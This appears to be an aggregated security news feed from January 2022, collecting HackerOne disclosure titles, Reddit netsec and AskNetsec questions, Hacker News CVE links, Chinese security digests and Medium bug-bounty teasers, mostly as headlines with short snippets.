    Adobe disclosed a bug submitted by letm3through: https://hackerone.com/reports/1386547
    Reflected XSS and open redirect on larksuite.com using /?back_uri= parameter.
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/955606 - Bounty: $500
    [IDOR] Modify other team's reminders via reminderId parameter
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/946323 - Bounty: $500

    Propagating phishing via Slack webhooks
    submitted by /u/amirshk
    Forensics Analysis of the NSO Group’s Pegasus Spyware
    submitted by /u/CyberMasterV
    BreakingFormation: Orca Security Research Team Discovers AWS CloudFormation Vulnerability
    submitted by /u/eberkut
    SSH Bastion Host Best Practices
    submitted by /u/old-gregg
    HiddenWall is a tool to generate a custom hidden firewall to run in the Linux kernel.
    submitted by /u/CoolerVoid
    This script analyses Nmap XML scan results, parses each CPE context and correlates it with CVE searches on NIST. You can use it to find public vulnerabilities in services.
    submitted by /u/CoolerVoid
  • Open

    Security bulletin for recent AWS Glue vulnerability
    Article URL: https://aws.amazon.com/security/security-bulletins/AWS-2022-002/ Comments URL: https://news.ycombinator.com/item?id=29927538 Points: 2 # Comments: 0  ( 2 min )
    CVE-2021-31166: MS HTTP Protocol Stack Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166 Comments URL: https://news.ycombinator.com/item?id=29924445 Points: 16 # Comments: 0
    Severe Vulnerability Found in Another NPM Package
    Article URL: https://twitter.com/DevNackOfficial/status/1481671995167506433 Comments URL: https://news.ycombinator.com/item?id=29923463 Points: 4 # Comments: 0  ( 1 min )
    AWS Superglue Vulnerability
    Article URL: https://orca.security/resources/blog/aws-glue-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29923004 Points: 29 # Comments: 3  ( 5 min )
    BreakingFormation: AWS CloudFormation Vulnerability
    Article URL: https://orca.security/resources/blog/aws-cloudformation-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29922522 Points: 79 # Comments: 22  ( 5 min )
    Attacking RDP from Inside: Remote Desktop Named Pipe Vulnerability
    Article URL: https://www.cyberark.com/resources/threat-research-blog/attacking-rdp-from-inside Comments URL: https://news.ycombinator.com/item?id=29920955 Points: 2 # Comments: 0  ( 11 min )
    Found a Vulnerability In NPM Package
    Article URL: https://twitter.com/DevNackOfficial/status/1481537073068843013 Comments URL: https://news.ycombinator.com/item?id=29918100 Points: 1 # Comments: 2  ( 1 min )
    Exploring the Log4Shell Vulnerability through files
    Article URL: https://blog.borneo.io/exploring-the-log4shell-vulnerability-dd7000eed4a4?gi=5d43b39b3d22 Comments URL: https://news.ycombinator.com/item?id=29915825 Points: 2 # Comments: 0  ( 7 min )
  • Open

    SPF Record Question
    If a root domain like sendgrid.net is added to an SPF record, does that mean any free user or paid user of sendgrid can spoof an email from your domain and SPF checks would pass? submitted by /u/mtx4gk [link] [comments]  ( 1 min )
    How do I check if I visited a site with malware?
    I was browsing through reddit and clicked on a link in r/dermotology that sent me to a weird site that played a weird video, and there was no question or content besides that. I used VirusTotal to check the website and it looks like they're using it for advertising revenue clicks, but my paranoia is kicking in. Site was visited on an Android with CalyxOS using DuckDuckGo version 5.106.0. So the question is: any ideas if I have to nuke this phone? For the curious, the website is below. All the spaces are slashes minus the dot com part. vebotto com 2022 01 13 cystic-pimple submitted by /u/instantpotbeans [link] [comments]  ( 2 min )
    Google Drive Security - VPN and MFA
    Hi there, I'm posting here to get some expert advice, we are a small startup dealing with very sensitive customer data. Problems we are having - How do we best protect customer data within Google Drive? Customers often share data to us via Google Drive. In security questionnaire, we often get this question - is VPN required for employees to access customer data? We can of course turn on VPN requirement for this, but it also adds friction to use Google Drive on a daily basis. Google Drive has MFA turned on, but it does not seem to enforce zero trust policy, and we are never prompted to enter passwords regularly. Any suggestions here? submitted by /u/Commercial_Rip7550 [link] [comments]  ( 1 min )
    Reverse engineering question
    Hi r/AskNetsec, I've got a pretty unusual question in regards to RE that might sound weird, or it's just not making sense to me (and bearing in mind, I am a beginner to reversing malware). I am currently writing a report and within the report format, "reverse engineering" and "disassembly" are two different sections. This doesn't really make much sense to me. Disassembly is already a form of reverse engineering. Nevertheless, the information that you could insert into an RE section would be Wireshark analysis, viewing the file in PEStudio for instance, but those are already in sections relating to static & dynamic analysis. So what would be inserted into a reverse engineering section regarding malware? I can literally only think of unpacking the malware, as everything else that would constitute reverse engineering is in other sections. Honestly, I have no idea. When I asked for some help in regards to knowing the distinction between the two, I was told that "disassembly" is a noun, and "reverse engineering" is a verb. Which is probably right, but it didn't help at all. An example of breaking encryption was proposed in relation to RE. Again, it didn't shed much light for me. I just want to be familiar with the distinction here. Thanks. submitted by /u/pat0000 [link] [comments]  ( 2 min )
    Need an antivirus solution for webapp in MS Azure that is compliant with EU data protection law
    We run a webapp in Azure. Users can upload .zip, .pdf, .png, .jpeg and .csv files, therefore an antivirus scanner is needed for those files. At another project we use ClamAV in an Azure container instance; the problem is containers don't scale very well. We would prefer a SaaS solution in Azure but there are few options. We need a solution that is scalable and doesn't send the files to servers outside the EU due to the local data protection law. At best the software is made by an EU company. We thought about "abusing" an Azure storage by uploading the files there and waiting to see if Microsoft Defender for Cloud reacts. Anyone have any experience with this? How fast would such a solution be? Any recommendations? TLDR: need antivirus software for file upload webapp in Azure, SaaS preferred, scalability, compliant with EU data protection law. Thank you for your help! submitted by /u/devsecops22 [link] [comments]  ( 2 min )
    Brave Browser --Flags Questions
    Hi there r/AskNetsec, I just wanted to ask a quick question: are these specific flags, out of the bunch that Brave runs, of any concern? The names sparked my interest and a bit of panic when I first noticed them after using it for about a month. IdleDetection --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed Whole flag trace is this if needed: [redacted]\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --origin-trial-public-key=[redacted]=,[redacted]= --brave_session_token=[redacted] --field-trial-handle=[redacted],[redacted],[redacted] --enable-features=AutoupgradeMixedContent,LegacyTLSEnforced,PasswordImport,PrefetchPrivacyChanges,Red…  ( 1 min )
    Is there a solution to encrypt an OS at the RAM/CPU level?
    Thinking about cloud threat models, is there a solution that exists that can encrypt an OS at the RAM/CPU level to further restrict a hosting provider's ability to reach, view and use a machine, beyond the usual disk encryption? While I am sure it's a long shot, there does exist a possibility where they can access the machine from a local terminal via their hosting infrastructure or dump the RAM on the hypervisor. Is there any way or value in preventing that, or is it just a risk that has to be accepted when using a cloud provider? submitted by /u/concon2015 [link] [comments]  ( 1 min )
  • Open

    AVG Tune Up
    Anybody know what service AVG Tuneup uses to perform a cleanup when the program is executed? submitted by /u/mikefromjerz [link] [comments]  ( 1 min )
    I’ve heard SANS FOR508 and the GCFA is challenging. How challenging is it for an entry level candidate who is just starting out?
    Any tips? Experiences? I’ve had hands on forensics experience and have FOR500 knowledge. Is FOR508 doable? submitted by /u/curiousgal1996 [link] [comments]  ( 3 min )
  • Open

    Using GitHub to manage your first CVE
    Article URL: https://authzed.com/blog/using-github-to-manage-your-first-cve/ Comments URL: https://news.ycombinator.com/item?id=29925154 Points: 4 # Comments: 0  ( 9 min )
    Prosody 0.11.12 released (CVE-2022-0217 fix)
    Article URL: https://blog.prosody.im/prosody-0.11.12-released/ Comments URL: https://news.ycombinator.com/item?id=29921870 Points: 3 # Comments: 0  ( 1 min )
    A Quick CVE-2022-21907 FAQ (work in progress)
    Article URL: https://isc.sans.edu/forums/diary/28234/ Comments URL: https://news.ycombinator.com/item?id=29917559 Points: 2 # Comments: 1  ( 1 min )
  • Open

    Index of Movies, TV series and Documentaries (lots of BBC, how it's made etc..).
    submitted by /u/josephalbright1 [link] [comments]  ( 1 min )
    Sporalis
    https://drive.google.com/drive/folders/1rmL4Yn7mJ78emYQ-PjIhDGYkph_9iEjZ https://drive.google.com/drive/folders/1s3v5WdrPLEvnGLbzM8RGSyI0iorkbU-W https://drive.google.com/drive/folders/1nitHECSorEadPtGwK5F_9-TdAcHHJGZG submitted by /u/Burlack [link] [comments]
    Dont mind me. Just dropping some links to check size before downloading
    https://drive.google.com/drive/folders/1X2L-UtctJulbDEP63NnLSwlEaXgwTe0x https://drive.google.com/drive/folders/1pMRoHMd3H0P0g6lvEWFUR1teiPSy9VqR https://drive.google.com/drive/folders/0B2UZmHpzoVm6eXYyM09PUXF1TDA?resourcekey=0-A5ZN-_lF1S2Eh3xmJSC9kw https://drive.google.com/drive/folders/1nfMA72hL1PHFTWVkzjlSBAmfPyBg89dx https://drive.google.com/drive/folders/17KyX_80h0yBUrc3X-PMa3EnXoE0kFmJJ?sort=13&direction=a submitted by /u/Burlack [link] [comments]  ( 1 min )
    FTP OEM Pc Builder
    I'm trying to list the different FTP servers from computer builders. I think most of them are already present on this /r. But perhaps bringing them together in a single post is a good idea? (I will add them as I find them / the community finds them)
    HP FTP : ftp://ftp.hp.com
    |Url: ftp://ftp.hp.com/||Urls file|
    |Extension (Top 5)|Files|Size|
    |.exe|106,034|5.61 TiB|
    |.ibr|862|5.21 TiB|
    |.zip|10,739|443.95 GiB|
    |.fmw|290|384.7 GiB|
    |.iso|256|322.51 GiB|
    |Dirs: 83,006 Ext: 1,375|Total: 793,218|Total: 12.98 TiB|
    |Date (UTC): 2022-01-12 17:29:09|Time: 02:19:06|Speed: 22.87 MB/s (182.9 mbit)|
    Created by [KoalaBear84's OpenDirectory Indexer v2.2.0.9](https://github.com/KoalaBear84/OpenDirectoryDownloader/)
    IBM FTP : ftp://ftp.software.ibm.com/
    |Url: ftp://ftp.software.ibm.com/||Urls file|
    |Extension (…  ( 2 min )
  • Open

    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on System Weakness »  ( 3 min )
    Why Bugfix Postmortems Are Good For Web3
    This past year has been eventful for anyone building on the Web3 stack — over the course of the year, DeFi has grown from a nascent… Continue reading on Immunefi »  ( 3 min )
    Launching Collector Portal for a closed beta group
    We are proud to announce our beta platform launch for selected users starting on the 26th of January. Continue reading on Envoy »  ( 2 min )
    FB Lite All Users Active Status Changed
    I’m glad you’re here. Please have fun reading (nmochea). Continue reading on Medium »  ( 1 min )
    C.S.T.I Lead To Account Takeover $$$
    Hello amazing hunter, Today i want to tell you a short story but this story has long memory for me. In this story i found some… Continue reading on System Weakness »  ( 2 min )
    Bug Bounty Methodology — Bug Hunting Checklist (PART-1)
    Hey, it’s me again back with another checklist. I saw various articles and tools specifically designed to exploit one vulnerability. It… Continue reading on Medium »  ( 2 min )
    My Perfect Bug Bounty Docker Setup
    I hate installing things on my computer because of the bloated slow mess it becomes overtime. So when I found out about docker I fell in… Continue reading on System Weakness »  ( 3 min )
    PHP Type Juggling
    PHP is the dynamic language that checks variables when the program is executing and provides flexibility to the developers. But this… Continue reading on Medium »  ( 1 min )
  • Open

    SecWiki News 2022-01-13 Review
    Running EXE programs filelessly via PowerShell by ourren; QRS 2021 accepted papers list by ourren; Getting started with Android reverse engineering, development and protocol analysis by analysing a football-betting app by ourren; For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    FreeBuf Morning Report | Financial data of large numbers of Americans and Canadians exposed; Firefox unable to connect to the internet
    Global news 1. Password manager LastPass may face a 20 million euro fine over poor bug handling: owing to inadequate problem resolution and other issues, the well-known password manager LastPass faces the risk of a 20 million euro GDPR fine. [Read original] 2. US prison hit by ransomware attack, surveillance cameras and door access systems disrupted: the Albuquerque area jail in central New Mexico was hit by a ransomware attack last week, leaving surveillance cameras inaccessible and affecting the automatic door control system, causing inmates  ( 1 min )
    FreeBuf customer-side group discussion | On the security of enterprise remote work
    From a security perspective, remote work means the boundary of the office network is broken; how should enterprises re-examine their security strategy to reduce risk?  ( 1 min )
    Millions of portable routers affected by KCodes NetUSB vulnerability
    Affected vendors include Netgear, TP-Link, Tenda, EDiMAX, D-Link and Western Digital.  ( 1 min )
    Financial data of large numbers of Americans and Canadians exposed
    Website Planet security researchers found a misconfigured database exposing about 820,000 records, of which about 600,000 were customer credit records.  ( 1 min )
    Behaviour analysis and decoding of the cross-platform malicious backdoor SysJoker
    In December 2021, Intezer discovered SysJoker, a cross-platform backdoor capable of attacking Windows, Mac and Linux.  ( 1 min )
    New SysJoker malware threatens Windows, Linux and macOS
    The new SysJoker malware is threatening Windows, Linux and macOS, using a cross-platform backdoor for espionage.  ( 1 min )
    Cybersecurity again highlighted in the "14th Five-Year Plan for Digital Economy Development"
    Chapter 9 of the Plan, "Strengthening the digital economy security system", systematically sets out the unique role and importance of cybersecurity for the digital economy.
    Studying cybersecurity laws and regulations to improve technical managers' legal literacy
    Understanding the hierarchy of different laws and regulations helps us better understand the state's aims in the legislative process.  ( 1 min )
  • Open

    Burp Suite roadmap for 2022
    With 2022 now underway, it's about time we gave you the latest on where Burp Suite is heading this year. Here we take a look at the powerful new Burp Suite features we'll be working on in 2022 - as we  ( 5 min )
  • Open

    Real or Fake? Spoof-Proofing Email With SPF, DKIM, and DMARC
    I briefly mentioned using DKIM to verify an email’s sender in a previous blog post that described the steps I took to determine whether a suspicious email was legitimate or a phishing attempt. In this post, we will take a deeper dive into how organizations can help stop email spoofing using a combination of three... The post Real or Fake? Spoof-Proofing Email With SPF, DKIM, and DMARC appeared first on TrustedSec.  ( 12 min )
  • Open

    Fuzzing101 with LibAFL – Part IV: Fuzzing LibTIFF
    Article URL: https://epi052.gitlab.io/notes-to-self/blog/2021-11-26-fuzzing-101-with-libafl-part-4/ Comments URL: https://news.ycombinator.com/item?id=29920636 Points: 1 # Comments: 0  ( 26 min )
  • Open

    Wading Through Muddy Waters | Recent Activity of an Iranian State-Sponsored Threat Actor
    submitted by /u/dmchell [link] [comments]
  • Open

    HONEYPOT DISCUSSIONS PART-1
    Welcome to Honeypot Discussions Part 1. There will be three part of article about honeypots. As here, in the first article we will be… Continue reading on Medium »  ( 5 min )

  • Open

    Miscellaneous Gaming Stuff.
    https://www.thegameisafootarcade.com/wp-content/uploads/ submitted by /u/EmuAnon34 [link] [comments]
    Are there such things as open navidrome / airsonic music servers to listen to?
    Rather than open directories of music, are there open servers that can be used with navidrome / airsonic clients to listen to the music? Are there strings one can use to maybe find them? The search engines aren't finding anything submitted by /u/papabear_12 [link] [comments]  ( 1 min )
  • Open

    Ransomware Damage Claims Driving Insurance Hikes
    The costs of cyber insurance policies are rising exponentially while underwriters are tightening the rules around who qualifies for cyber insurance, and at the same time, insurer capacity is constricting dramatically. The numbers are all over the place, but the latest statistics from the Council of Insurance Agents and Brokers reported a 25.5% increase in […] The post Ransomware Damage Claims Driving Insurance Hikes appeared first on Security Weekly.  ( 3 min )
  • Open

    Defeating EDRs with Office Products
    submitted by /u/dmchell [link] [comments]
  • Open

    Exploiting URL Parsing Confusion Vulnerabilities
    submitted by /u/ScottContini [link] [comments]
    Exploit Kits vs. Google Chrome
    submitted by /u/stashing_the_smack [link] [comments]
    Malicious modifications to open source projects affecting thousands
    submitted by /u/MiguelHzBz [link] [comments]  ( 1 min )
    Pre-Auth RCE in Moodle Part II - Session Hijack in Moodle's Shibboleth
    submitted by /u/albinowax [link] [comments]
    ThePhish is an open-source tool that automates the entire phishing email analysis process starting from the extraction of the observables from the header and the body of an email to the elaboration of a verdict which is final in most cases. It is based on TheHive, Cortex and MISP.
    submitted by /u/emalderson [link] [comments]  ( 1 min )
    Ransomware Actor May Have Leaked Their Previous Victims
    submitted by /u/Acrobatic-Pen-9949 [link] [comments]  ( 1 min )
    Researchers release final version of academic study testing 25 EDR and EPP vendors against attacks vectors via CPL, HTA, DLL and EXE
    submitted by /u/woja111 [link] [comments]  ( 1 min )
    [CFP] Call for Papers for Hardwear.io Security Conference USA 2022 is OPEN!
    submitted by /u/hardweario [link] [comments]
  • Open

    AFL TUTORIALS FOR BEGINNERS 0X00
    For beginners: compiling with AFL, using libs/objects, how to fuzz with AFL/AFL++ Continue reading on Medium »  ( 2 min )
  • Open

    Lessons learned from my 10 year open source project
    For the past ten years, I’ve been building a popular open source project. Here are the lessons I’ve learned along the way. Continue reading on Medium »  ( 11 min )
    Bundesservice Telekommunikation — how I accidentally discovered a front agency in the federal administration…
    A few days ago I did something so unusual that apparently almost nobody had done it before me: I looked at the list… Continue reading on Medium »  ( 6 min )
    OSINT PAKISTAN POLITICIANS
    OSINT CASE STUDY 2 Continue reading on Medium »  ( 3 min )
    It’s a Match! Dating Apps and SOCMINT
    Just like any other social media platform, dating sites are platforms which can be used in online investigations. Considering the current… Continue reading on Medium »  ( 4 min )
  • Open

    Creative / Effective ways to run a security awareness program?
    It's that time of the year again: we are looking to renew our contract with our security awareness vendor. Basically, they provide a portal where people need to go to watch videos on how to prevent the regular security stuff (identify tailgating, spot phishing mails, etc). Some of these videos don't even make sense (e.g. we are 99% working from home. Tailgating is not a real issue here). Part of this is a "must do" (due to compliance/certification requirements). However, there must surely be a more fun/creative way of doing this? What are some nice/creative ways you have set up security awareness within your organization? Side-note: yes, I know this should be risk based. Yes, I know I should talk to other departments to identify their needs. ;) Just looking for some experiences and ideas. submitted by /u/Flagcapturer [link] [comments]  ( 1 min )
    What is your home setup like and what tech gadgets do you have in your room?
    Hi I work in the InfoSec industry and having worked from home for the last year or so, I want to now start doing up my room and make it very techy At the moment, I do not have anything too exciting or amazing but I am interested to know what your home setups are like Thanks submitted by /u/dasozis [link] [comments]  ( 2 min )
    I get to help design a Cybersecurity room
    As the title says, I get to help design a cyber security room for a community college. I want to ask the Netsec community: what would you like to see if you were young and were curious about this world? Tools you wish you had? Something that would have made you excited when you walked past to get into cyber security? All recommendations welcome, thank you! submitted by /u/benxfactor [link] [comments]  ( 3 min )
    Any resources/guides on pen-testing a network not facing the internet?
    Anyone have any resources for pen-testing a network that's supposed to be air gapped? I'm working with some colleagues to pen-test our professor's lab as part of our assignment--mainly putting together a report on how we would approach the system if we had hands-on access as both an admin and as a non-privileged user. The lab itself is pretty simple--it's not supposed to be running any web apps or even to be touching the internet. Most pentest guides are great at showing you how to approach scanning the network for misconfigurations and vulnerabilities and then moving over to web applications, but I'm wondering if we're limited to just enumerating the system and hoping for the best? Mainly looking for resources I can use as references to back any ideas on what's doable. Thanks. submitted by /u/CyberspaceAggressor [link] [comments]  ( 1 min )
    Another subnetting question!
    I'm given the following network address - 209.165.201.0 /24. If I'm splitting this network into two, LAN1 will have 29 hosts and LAN2 with 17 hosts. What I did to subnet this network was incorrect but I don't know the correct answer. I thought LAN1 would have an IP of 209.165.201.0 /27 and LAN 2 would be 209.165.201.33 /27, but from what I understand now is that these subnets cannot share the same CIDR. How would you go about doing this? submitted by /u/crumbjuice [link] [comments]  ( 1 min )
    Potential Risk from Using Bluetooth Headset on a company laptop?
    My company provides work laptops and headsets. However, they don't have an option for wireless headsets, only wired ones. They also advise against connecting any non-company-authorised peripherals to the laptop. I am wondering though, what would be realistic risks from connecting a Bluetooth headset to a laptop? submitted by /u/rw1337 [link] [comments]  ( 3 min )
    Internship Questions
    About a month after getting my CCNA training, I have my first interview for an internship in well-known MNC bank in networking field.. & I'm terribly nervous Guys, can you help me with some common questions asked in Bank Networking Interview.. submitted by /u/Aggressive-Dot-7339 [link] [comments]  ( 1 min )
    Best Identity Theft services for Companies
    In your experience, what are the best identity theft services for companies/brands (not for individuals)? I am talking of services like: Identity Guard, LifeLock, IdentityForce, Watchdog. Thanks for the answers. submitted by /u/NerdSupremacist [link] [comments]  ( 2 min )
    Scanning for Network Listening Device - What is Blackice?
    Hey all, first of all, thanks for any help anyone can provide. I have a limited background in network security understanding from my undergrad in computer science, but have not dipped my toes in seriously in a while, so I'm kinda stumbling through trying to figure this out. A friend asked me to check their network for any rogue listening devices and after a quick scan with Nmap, I came across this device on 192.168.0.1 described as "blackice-icecap". A quick Google search makes it sound like this might actually be some kind of device set up to monitor network traffic. Is this something that is worth digging deeper into or am I misunderstanding this? What other avenues for rogue network monitoring should I be looking into? My first thought is that this is all probably a bit over my head, but I thought I'd at least give it a quick peek to see if I can find anything obvious to help my friend out. Thanks again for any feedback or advice. For reference, here is the relevant part of the Nmap result: Nmap scan report for 192.168.0.1 Host is up (0.033s latency). Not shown: 995 closed tcp ports (conn-refused) PORT STATE SERVICE 80/tcp open http 443/tcp open https 5000/tcp open upnp 8081/tcp filtered blackice-icecap 8082/tcp filtered blackice-alerts submitted by /u/wwants [link] [comments]  ( 1 min )
    Using mobile hotspot on my laptop. Where do I turn on VPN - phone or laptop?
    Hi all, simple question but very hard to find the answer. When I don't have access to good wifi, I'm going to be using mobile hotspot to access the internet on my laptop. Question is, where do I turn on my VPN: on my laptop? Or on my phone? Or, just to be safe, on both? submitted by /u/AliveandDrive [link] [comments]  ( 3 min )
    Password Cracking LDS
    Has anyone ever done a password audit against an Active Directory LDS server (not a regular AD server)? If so, any directions on how to extract the hashes using standard tools like Impacket or DSInternals? We have a procedure to crack our AD passwords using these tools but LDS seems to be a slightly different beast. submitted by /u/clayjk [link] [comments]  ( 1 min )
    Best way to remove card from multiple services?
    I would like to unlink my card details on various services. It would be kind of a lot of work to login to each service and delete that info. Is there another way? Would just getting a new card be a good option? submitted by /u/extremexample [link] [comments]  ( 2 min )
    Can the operators of SS7s pull SMSs from carriers in the US at will?
    Provocative title, I know. "At will" is subjective. It was claimed in a post yesterday and today that this is something that SS7 operators can do (which is true). I talked to a security researcher (Lucky 225 on Twitter) who told me that the US is more locked down than other countries and phones 2014+ are using LTE implying that maybe most phones in the US aren't vulnerable to this. Of course, he's not a god and not omnipotent as none of us are. There are things that he doesn't know (as is the case for us all). Does anyone have more information on this that could clarify the extent of the vulnerability in terms of location, G (2G, 3G, etc) and limitations so we can know what we might be vulnerable to? Obviously, getting access to an SS7 is WAY harder than a smartphone, sim card and someone's personal info so maybe this isn't the biggest threat, but still... submitted by /u/iExtrapolate314 [link] [comments]  ( 4 min )
  • Open

    Cybrary
    Hello, I’m currently pursuing my BS in Computer Forensics and Digital Investigation. I came across Cybrary and was wondering if that can help me practice more on the subject? I still feel very lost when taking college courses; I want to get more practice in, and just want to know if Cybrary is worth the annual membership. If anyone has some tips on what courses to take there or other sites I would appreciate it. Thank you in advance. submitted by /u/Sudden_Ad9859 [link] [comments]  ( 1 min )
    Investigating Message Read Status in Gmail & Google Workspace
    submitted by /u/No_Reflection_3360 [link] [comments]  ( 1 min )
    Interview questions
    So I read the FAQ and went through the SANs link which is posted to prepare for interviews in forensics. I am a recent graduate with a DF degree, and I had my first interview the other day but I am wondering what I could expect for the technical portion of the interview. Are there certain artifacts or definitions I should make sure I’m familiar with that can help? or any common scenario questions that get asked? I apologize if this isn’t the right place to ask this. submitted by /u/investtam [link] [comments]  ( 2 min )
  • Open

    Playing with Kerberos tickets (Host service)
    I’m going to share the results of some experimentation with Kerberos tickets. I’m sorry if this doesn’t add any new value or someone else… Continue reading on System Weakness »  ( 8 min )
  • Open

    Where can I learn windows binary exploitation from the basics?
    submitted by /u/wlo1337 [link] [comments]  ( 1 min )
  • Open

    EscapeRoom — PCAP Analysis with Wireshark
    This article provides my approach for solving the EscapeRoom CTF created by The Honeynet Project on the CyberDefenders website, a blue…  ( 8 min )
    Windows application exploitation series PART 1 — Leaky Handles
    What are handles? As per MSDN, Objects are data structures that represent a system resource, this can be a file, process, thread, etc. However, we cannot interact with them directly, to access the…  ( 3 min )
    Day 9 CN- Network Security Devices #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    CyberDefenders | L’espion
    The OSINT write-ups  ( 4 min )
    [Day 2] Web Exploitation Elf HR Problems | Advent of Cyber 3 (2021)
    The second day, we will be learning about Authentication Bypass.  ( 2 min )
    IDOR — TryHackme
    Writeup on Access Control  ( 3 min )
    Secure Development Principles
    When developing new applications, a particularly web based or mobile applications, software development teams often find themselves fixing…  ( 7 min )
  • Open

    SecWiki News 2022-01-12 Review
    Gartner 2021 Market Guide for Vulnerability Assessment products by ourren; Quick reference to emerging cybersecurity segments and vendors · Cyber Security Billboard by ourren; An analysis of cyberspace mapping and attribution techniques by ourren; A survey of research on cyberspace threat hunting by ourren; Chang'an "Battle against the Epidemic" CTF WriteUp by ourren; APT Group Intelligence Research Yearbook 2021 by ourren; For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Preventing Broken Access Control: The No.1 OWASP Vulnerability in 2021
    Article URL: https://www.synack.com/blog/preventing-broken-access-control-the-no-1-vulnerability-in-the-owasp-top-10-2021/ Comments URL: https://news.ycombinator.com/item?id=29908197 Points: 3 # Comments: 0  ( 6 min )
  • Open

    FreeBuf Morning Report | The EU will launch a large-scale supply-chain security exercise; Tesla vehicle software reported to have a security flaw
    A security researcher says that software in some Tesla vehicles has a "serious" flaw that can remotely unlock doors and windows, start the vehicle without a key, and disable security systems.  ( 1 min )
    MLPS 2.0 assessment: a process guide to the secure computing environment for GaussDB (Huawei's Gauss database)
    An assessment guide for the Gauss database in a Huawei private cloud deployment  ( 1 min )
    Small and medium-sized enterprises are easy targets for cyberattacks
    51% of SMEs have experienced a cybersecurity breach, and the resulting cybercrime has become an urgent problem.
    Great Wall Motor is hiring multiple security professionals
    Great Wall Motor, a Chinese automobile brand founded in 1984, is hiring several security professionals.  ( 1 min )
    Applying and deploying cryptographic techniques for personal-information compliance
    Implementing personal-information compliance, especially the obligation to safeguard personal information, is not only a legal problem but also an information-security engineering problem.  ( 1 min )
    A new variant of the RedLine information stealer spreads disguised as an Omicron case counter
    RedLine targets information such as user account credentials stored in browsers.  ( 1 min )
    斗象 (Tophant) PRS-NTA passes Huawei Kunpeng 920 compatibility certification
    Committed to the domestic IT innovation (信创) initiative, Tophant continues to deepen cooperation within the domestic technology ecosystem.
    Firefox Focus for Android strengthens privacy protection and blocks cross-site tracking
    Firefox Focus for Android further strengthens its privacy protections, preventing cookies from being used for advertising and behavioural analytics, so that users are protected from cross-site tracking while browsing.  ( 1 min )
    Examples of common encryption schemes
    When testing for logic flaws or writing crawlers, if we run into front-end encryption we can extract the encryption routine and use it to encrypt the parameters we are debugging ourselves.  ( 10 min )
    Microsoft: the powerdir vulnerability allows access to macOS user data
    Microsoft reports that threat actors can exploit a macOS vulnerability to bypass the Transparency, Consent, and Control (TCC) framework and access users' protected data.  ( 1 min )
    Notes on industrial cyber ranges (7) | Outlook on development trends
    Digital transformation is accelerating the convergence of OT and IT, and the cybersecurity risks of that convergence are evolving along with it.  ( 1 min )
    Hackers used a vulnerability to wipe out debts: how could such flaws be caught earlier?
    Exploiting a vulnerability to clear debts, steal data, or gain login access to every account of some game with one click: these "stunts" that sound like pulp fiction have long been playing out in reality.  ( 1 min )
  • Open

    How to attack Offensive Security Web Expert (OSWE)
    In this article, we will discuss one of the toughest exams from Offensive Security, the Web Expert one (OSWE). Continue reading on Medium »
    Bug Bounty Methodology — Horizontal Enumeration
    While performing a security assessment our main goal is to map out all the domains owned by a single entity. This means knowing all the… Continue reading on Medium »  ( 3 min )
    Xiaomi Arbitrary JavaScript Vulnerability
    I’m glad you’re here. Please have fun reading (nmochea). Continue reading on Medium »  ( 1 min )
    learning prerequisites for hacking and bug bounty?
    Hey computer geeks. I am writing this because I have faced many problems getting started in “cyber security” because I don’t know where… Continue reading on Medium »  ( 3 min )
    Attacking ARP: Learn Networking By Breaking Stuff For Bug Bounty Hunters, Penetration Testers, and…
    An introduction to the fundamentals of one of the most important protocols on the internet and the methodology to exploit it for fun and… Continue reading on Dev Genius »  ( 5 min )
    Subdomain Enumeration — The Right way (Prerequisites)
    So, I have seen various articles about subdomain enumeration and decided to make one in detail without confusing everyone with various… Continue reading on Medium »  ( 3 min )
  • Open

    Friend Request Flow Exposes User Data
    Zenly disclosed a bug submitted by yetanotherhacker: https://hackerone.com/reports/1245741 - Bounty: $750
    Account Takeover via SMS Authentication Flow
    Zenly disclosed a bug submitted by yetanotherhacker: https://hackerone.com/reports/1245762 - Bounty: $1750
    CSRF to change password
    Nord Security disclosed a bug submitted by paramdham: https://hackerone.com/reports/204703 - Bounty: $300
    Clickjacking to change email address
    Gener8 disclosed a bug submitted by paramdham: https://hackerone.com/reports/783191

  • Open

    CyberDefenders | L’espion
    The OSINT write-ups Continue reading on InfoSec Write-ups »  ( 3 min )
    What is OSINT
    Have you been trying to find someone online, specifically perhaps by using an email address or username? Continue reading on Medium »  ( 7 min )
    Using fitness tracker apps for OSINT purposes
    The smartwatches and fitness trackers we wear know a myriad of information about us… From the places we visit, our coordinates, our health… Continue reading on Medium »  ( 5 min )
    OSINT: Open Source Intelligence
    If you’ve heard the name but are wondering what it means, OSINT stands for open source intelligence, which refers to any information that… Continue reading on Medium »  ( 3 min )
  • Open

    CVE-2021-45608 – NetUSB RCE Flaw in Millions of End User Routers
    Article URL: https://www.sentinelone.com/labs/cve-2021-45608-netusb-rce-flaw-in-millions-of-end-user-routers/ Comments URL: https://news.ycombinator.com/item?id=29897289 Points: 3 # Comments: 0  ( 6 min )
    Windows HTTP Protocol Stack RCE Vulnerability (CVE-2022-21907)
    Article URL: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907 Comments URL: https://news.ycombinator.com/item?id=29896565 Points: 3 # Comments: 2
    Writing an Exploit for CVE-2021-20038 (SonicWall SSL VPN)
    Article URL: https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038 Comments URL: https://news.ycombinator.com/item?id=29891670 Points: 1 # Comments: 0  ( 24 min )
  • Open

    Finding vulnerabilities in LoRaWAN's Protocol Stacks: Emulation with Qiling/Unicorn, P-Code emulation with Ghidra and AFL++ Fuzzing (Quick summary + complete 40-page paper)
    submitted by /u/sebazzen [link] [comments]  ( 1 min )
    How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more.
    submitted by /u/jat0369 [link] [comments]
    Risk-aware applications
    submitted by /u/TolgaDevSec [link] [comments]
